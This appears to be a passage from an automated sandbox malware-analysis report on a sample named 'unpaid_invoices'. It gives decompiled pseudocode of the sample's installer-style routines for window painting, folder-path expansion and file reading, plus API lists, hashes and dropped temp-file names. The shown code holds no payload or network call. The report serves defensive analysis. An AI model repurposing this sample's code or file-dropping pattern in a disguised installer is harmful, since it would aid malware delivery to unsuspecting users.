              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
              • String ID: %ls=%ls$(Vz$(^z$(^z$[Rename]
              • API String ID: 2171350718-2000197835
              • Opcode ID: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
              • Instruction ID: 6cadb61bc7003589c9facc341004653e1fa6c0793f9c109ef5d6a16b2289e69d
              • Opcode Fuzzy Hash: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
              • Instruction Fuzzy Hash: 2D313571600705BBD2206B669D48F1B3A9CEF85714F16003EFD42FA2C2DA7DD82586BD
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
              Download Yara Rule
              C-Code - Quality: 90%
              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x7a8ab0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x7a7aa0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8aa8;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













              0x0040100a
              0x00401039
              0x00401047
              0x0040104d
              0x00401051
              0x0040105b
              0x00401061
              0x00401064
              0x004010f3
              0x00401089
              0x0040108c
              0x004010a6
              0x004010bd
              0x004010cc
              0x004010cf
              0x004010d5
              0x004010d9
              0x004010e4
              0x004010ed
              0x004010ef
              0x004010ef
              0x00401100
              0x00401105
              0x0040110d
              0x00401110
              0x00401112
              0x00401118
              0x0040111f
              0x00401126
              0x00401130
              0x00401142
              0x00401156
              0x00401160
              0x00401165
              0x00401165
              0x00401110
              0x0040116e
              0x00000000
              0x00401178
              0x00401010
              0x00401013
              0x00401015
              0x0040101f
              0x0040101f
              0x00000000

              APIs
              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
              • BeginPaint.USER32(?,?), ref: 00401047
              • GetClientRect.USER32 ref: 0040105B
              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
              • FillRect.USER32 ref: 004010E4
              • DeleteObject.GDI32(?), ref: 004010ED
              • CreateFontIndirectW.GDI32(?), ref: 00401105
              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
              • SelectObject.GDI32(00000000,?), ref: 00401140
              • DrawTextW.USER32(00000000,007A7AA0,000000FF,00000010,00000820), ref: 00401156
              • SelectObject.GDI32(00000000,00000000), ref: 00401160
              • DeleteObject.GDI32(?), ref: 00401165
              • EndPaint.USER32(?,?), ref: 0040116E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
              • String ID: F
              • API String ID: 941294808-1304234792
              • Opcode ID: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
              • Instruction ID: 97a6e5849d711934decb320d9e1447055a7c39d586dd296ee09aa65e352ff849
              • Opcode Fuzzy Hash: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
              • Instruction Fuzzy Hash: 83418C71800209AFCF058F95CE459AF7BB9FF45315F00802AF991AA1A0CB389A55DFA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004066AB Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON
              Download Yara Rule
              C-Code - Quality: 72%
              			E004066AB(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x7a7a7c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x7a8ad8 + _t44 * 2;
				_t45 = 0x7a6a40;
				_t108 = 0x7a6a40;
				if(_a4 >= 0x7a6a40 && _a4 - 0x7a6a40 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E0040666E(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066AB(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x7a6a40;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x7a9000;
								E0040666E(_t108, (_t78 << 0xb) + 0x7a9000);
							} else {
								E004065B5(_t108,  *0x7a8aa8);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068F5(_t108);
							}
							goto L38;
						}
						if( *0x7a8b24 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x7a8aa4;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E0040653C( *0x7a8ad8, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8ad8 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066AB(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























              0x004066ab
              0x004066ab
              0x004066ab
              0x004066b1
              0x004066b6
              0x004066c7
              0x004066c7
              0x004066cf
              0x004066d0
              0x004066d1
              0x004066d2
              0x004066d5
              0x004066dd
              0x004066df
              0x004066f0
              0x004066f3
              0x004066f3
              0x004066f7
              0x004066fd
              0x00406700
              0x004068db
              0x004068db
              0x004068e6
              0x004068f2
              0x004068f2
              0x00000000
              0x00406706
              0x0040670b
              0x00406720
              0x00406721
              0x00406727
              0x004068b9
              0x004068c7
              0x004068ca
              0x004068ca
              0x004068bb
              0x004068be
              0x004068c1
              0x004068c3
              0x004068c3
              0x004068cc
              0x004068cc
              0x004068d2
              0x004068d5
              0x00406708
              0x00000000
              0x00406708
              0x00000000
              0x004068d5
              0x0040672d
              0x00406730
              0x0040673f
              0x00406746
              0x00406752
              0x00406755
              0x00406758
              0x00406759
              0x0040675e
              0x00406764
              0x00406767
              0x0040676a
              0x0040685d
              0x00406862
              0x00406895
              0x0040689a
              0x0040689f
              0x004068a4
              0x004068a4
              0x004068a9
              0x004068af
              0x004068b2
              0x00000000
              0x004068b2
              0x00406864
              0x00406867
              0x0040686a
              0x0040687f
              0x00406886
              0x0040686c
              0x00406873
              0x00406873
              0x0040688e
              0x00406891
              0x00406855
              0x00406856
              0x00406856
              0x00000000
              0x00406891
              0x00406777
              0x0040677b
              0x0040677b
              0x0040677c
              0x0040677e
              0x004067bb
              0x004067be
              0x004067ce
              0x004067d1
              0x004067d9
              0x004067df
              0x004067df
              0x0040683a
              0x0040683a
              0x0040683c
              0x00000000
              0x00000000
              0x004067e3
              0x004067e8
              0x004067e9
              0x004067eb
              0x00406802
              0x00406810
              0x00406816
              0x00406818
              0x00406836
              0x00406836
              0x00406836
              0x00000000
              0x00406836
              0x0040681e
              0x00406827
              0x0040682a
              0x00406830
              0x00406834
              0x00000000
              0x00000000
              0x00000000
              0x00406834
              0x004067fc
              0x004067fe
              0x00406800
              0x00000000
              0x00000000
              0x00000000
              0x00406800
              0x00000000
              0x0040683a
              0x004067c6
              0x00000000
              0x00406780
              0x0040679e
              0x004067a7
              0x00406844
              0x00406848
              0x00406850
              0x00406850
              0x00000000
              0x00406848
              0x004067b1
              0x0040683e
              0x00406842
              0x00000000
              0x00000000
              0x00000000
              0x00406842
              0x0040677e
              0x00000000
              0x0040670b

              APIs
              • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,00000400), ref: 004067C6
              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,00000400,00000000,007A0F68,?,00405707,007A0F68,00000000,00000000,00000000,00000000), ref: 004067D9
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,\Microsoft\Internet Explorer\Quick Launch), ref: 00406850
              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: Directory$SystemWindowslstrcatlstrlen
              • String ID: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
              • API String ID: 4260037668-2589404401
              • Opcode ID: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
              • Instruction ID: c9eaf07520507b798c7259a568fd9567d3c8f5a418c476a208567326fda18bee
              • Opcode Fuzzy Hash: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
              • Instruction Fuzzy Hash: F061FF72902115AADF10AF68CC40BAE37A5AF55314F22C03FE947B62D0DB3D49A5CB89
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404631 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00404631(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









              0x00404643
              0x004046f9
              0x00000000
              0x004046f9
              0x00404654
              0x00404658
              0x00000000
              0x00404672
              0x00404672
              0x0040467b
              0x00000000
              0x00000000
              0x0040467d
              0x00404689
              0x0040468c
              0x0040468c
              0x00404692
              0x00404698
              0x00404698
              0x004046a4
              0x004046aa
              0x004046b1
              0x004046b4
              0x004046b7
              0x004046b9
              0x004046b9
              0x004046c1
              0x004046c7
              0x004046c7
              0x004046d1
              0x004046d6
              0x004046d9
              0x004046de
              0x004046e1
              0x004046e1
              0x004046f1
              0x004046f1
              0x00000000
              0x004046f4

              APIs
              • GetWindowLongW.USER32(?,000000EB), ref: 0040464E
              • GetSysColor.USER32(00000000), ref: 0040468C
              • SetTextColor.GDI32(?,00000000), ref: 00404698
              • SetBkMode.GDI32(?,?), ref: 004046A4
              • GetSysColor.USER32(?), ref: 004046B7
              • SetBkColor.GDI32(?,?), ref: 004046C7
              • DeleteObject.GDI32(?), ref: 004046E1
              • CreateBrushIndirect.GDI32(?), ref: 004046EB
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
              • String ID:
              • API String ID: 2320649405-0
              • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
              • Instruction ID: 80d2dfdfbb5be5877469216c844a522b7394a6fa1e0a99176855ee87e7478973
              • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
              • Instruction Fuzzy Hash: EC2179B15007049BC730DF68D908B5BBBF8AF41714F048E2EE9D6A26E1E739D944DB68
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
              Download Yara Rule
              C-Code - Quality: 87%
              			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x7a8b28 =  *0x7a8b28 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065CE(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040623F( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061E1( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065B5( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








              0x004026ec
              0x004026ee
              0x004026f1
              0x004026f3
              0x004026f6
              0x004026fb
              0x004026ff
              0x00402702
              0x00402705
              0x00402c2a
              0x00402c2d
              0x0040270b
              0x0040270b
              0x00402712
              0x00402714
              0x00402714
              0x0040271a
              0x0040287e
              0x0040287e
              0x00402881
              0x00402886
              0x004015b6
              0x0040292e
              0x0040292e
              0x00000000
              0x00402720
              0x00402721
              0x0040272c
              0x0040272f
              0x0040273b
              0x0040273f
              0x004027d7
              0x004027ef
              0x004027ff
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00402745
              0x00402745
              0x00402748
              0x00402749
              0x0040274c
              0x00402751
              0x00402758
              0x00402760
              0x00000000
              0x00402766
              0x00402766
              0x0040276b
              0x00000000
              0x00402771
              0x00402771
              0x00402779
              0x0040277c
              0x0040277f
              0x0040283a
              0x00402841
              0x00402785
              0x0040278b
              0x00402797
              0x00402801
              0x00402801
              0x00402799
              0x00402799
              0x0040279c
              0x0040279e
              0x0040279e
              0x0040279e
              0x004027a1
              0x004027a6
              0x004027a9
              0x00000000
              0x00000000
              0x004027ab
              0x004027ae
              0x004027bc
              0x004027c2
              0x004027d0
              0x00000000
              0x004027d2
              0x00000000
              0x004027d2
              0x00000000
              0x004027d0
              0x0040279e
              0x00402804
              0x00402807
              0x00000000
              0x00402809
              0x0040280e
              0x0040284f
              0x00402871
              0x00402878
              0x0040285d
              0x0040285d
              0x00402860
              0x00402863
              0x00402866
              0x00402866
              0x00000000
              0x00402817
              0x00402817
              0x0040281a
              0x0040281d
              0x00402823
              0x00402827
              0x0040282a
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0040282a
              0x0040280e
              0x00402807
              0x0040277f
              0x0040276b
              0x00402760
              0x00000000
              0x0040282c
              0x0040282c
              0x0040282f
              0x00402838
              0x00000000
              0x0040272f
              0x0040271a
              0x00402c33
              0x00402c39

              APIs
              • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                • Part of subcall function 0040623F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026D1,00000000,00000000,?,00000000,00000011), ref: 00406255
              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
